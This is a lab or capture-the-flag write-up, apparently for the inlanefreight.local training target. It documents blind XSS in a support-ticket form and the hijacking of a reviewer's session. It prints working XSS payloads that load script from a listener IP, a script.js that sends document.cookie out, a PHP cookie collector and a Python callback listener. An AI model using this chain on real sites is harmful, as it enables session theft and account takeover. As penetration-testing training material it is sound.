## `support.inlanefreight.local`
- looks like `inlanefreight.local:8080` ![[images/Pasted image 20260628152057.png]]
- submit test ticket via `/ticket.php` ![[images/Pasted image 20260630122138.png]]
- `request:response` in burp ![[images/Pasted image 20260630122059.png]]
- the response says someone will review the ticket soon, so the submitted fields are probably rendered in a staff-facing page we cannot see: a candidate for blind XSS
### Fuzzing
- directory![[images/Pasted image 20260630164638.png]]
- page ![[images/Pasted image 20260630164631.png]]
### Blind XSS
- based on the review message above, test for blind XSS with a remote script include pointing at our listener; the path (`TESTING_THIS`) is just a tag, so the callback tells us which injection fired
```javascript
"><script src=http://10.10.15.114:9000/TESTING_THIS></script>
```
![[images/Pasted image 20260630124030.png]]
- we got a callback to our listener, so the message field is rendered unescaped somewhere on the staff side ![[images/Pasted image 20260630124301.png]]
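A small listener for the callback step, added here as an example and not part of the original notes or the lab. It tags each payload with the field it was injected into, so a hit in the log says which input (and not just whether one) is rendered; it also records any `?c=<document.cookie>` query the later `script.js` sends, so the same process can stand in for `index.php`. The port 9000, the `callbacks.txt` filename and the field names `ticket-subject`/`ticket-message` are assumptions, not from the page.

```python
"""Blind-XSS callback listener (added example, not the page's own code)."""
import http.server
import socketserver
import urllib.parse
from datetime import datetime, timezone

LISTEN_PORT = 9000          # assumed: matches the port used in the first payload
LOG_FILE = "callbacks.txt"  # assumed filename


def make_payload(listener, tag):
    """Remote script include whose path carries a per-field tag."""
    return f'"><script src=http://{listener}/{tag}></script>'


def parse_callback(path, remote_addr):
    """Turn a request into a record: which tag fired, from which IP, plus any
    cookies passed as ?c=<document.cookie> (the format script.js uses)."""
    parts = urllib.parse.urlsplit(path)
    tag = parts.path.strip("/") or "(no tag)"
    cookies = {}
    # Parse the query by hand: document.cookie contains ';' and older parse_qs
    # versions split on ';' as well as '&', which would mangle the value.
    for param in parts.query.split("&"):
        if not param.startswith("c="):
            continue
        for pair in urllib.parse.unquote_plus(param[2:]).split(";"):
            name, _, value = pair.strip().partition("=")
            if name:
                cookies[name] = value
    return {"tag": tag, "ip": remote_addr, "cookies": cookies}


def format_record(rec, when=None):
    """One log line per callback; the tag identifies the injection point."""
    when = when or datetime.now(timezone.utc)
    cookie_str = "; ".join(f"{k}={v}" for k, v in rec["cookies"].items()) or "-"
    return f"{when.isoformat()} tag={rec['tag']} ip={rec['ip']} cookies={cookie_str}"


class CallbackHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        line = format_record(parse_callback(self.path, self.client_address[0]))
        print(line)
        with open(LOG_FILE, "a") as fh:
            fh.write(line + "\n")
        # Reply with an empty but valid JavaScript body so the victim's page
        # shows no script error for the <script src=...> include.
        self.send_response(200)
        self.send_header("Content-Type", "application/javascript")
        self.end_headers()

    def log_message(self, *args):
        # suppress the default access log; our one-line records are enough
        pass


if __name__ == "__main__":
    # assumed field names: one tagged payload per input we want to test
    for field in ("ticket-subject", "ticket-message"):
        print(f"payload for {field}: {make_payload('10.10.15.114:9000', field)}")
    socketserver.TCPServer.allow_reuse_address = True
    with socketserver.TCPServer(("0.0.0.0", LISTEN_PORT), CallbackHandler) as srv:
        srv.serve_forever()
```

Run it, paste one tagged payload per field into the ticket form, and wait: the log line `tag=ticket-message` (or whichever tag you chose) is the confirmation of which field the reviewer's page renders unescaped.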
### session hijacking
- create `script.js` (sends the victim's `document.cookie` to our collector; note that `document.location` redirects the victim's tab, so it is noisy but fine for the lab) and `index.php`
```javascript
// redirect the victim's browser to our collector with document.cookie appended
document.location='http://10.10.15.114:8081/index.php?c='+document.cookie;
```
```php
<?php
// collector: append one line per stolen cookie to cookies.txt
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    $file = fopen("cookies.txt", "a+");
    foreach ($list as $value) {
        $cookie = urldecode(trim($value));
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
    }
    fclose($file);
}
?>
```
- then host both files with PHP's built-in server on the port the payload points at (8081; the target app itself is on 8080, and no root is needed for a port above 1024)
```bash
php -S 0.0.0.0:8081
```
- inject the XSS into the message field
```javascript
"><script src=http://10.10.15.114:8081/script.js></script>
```
- got a hit on the PHP server ![[images/Pasted image 20260630130201.png]]
- cookie written to `cookies.txt`; since it was readable through `document.cookie`, the session cookie is not `HttpOnly`, which is what makes the hijack possible ![[images/Pasted image 20260630130228.png]]
- browse to `login.php` and open dev tools in Firefox
- in the Storage tab add a cookie named `session` with the stolen value, then reload the page ![[images/Pasted image 20260630164408.png]]
- we now have access to `dashboard.php` as the reviewer, without knowing their password ![[images/Pasted image 20260630164427.png]]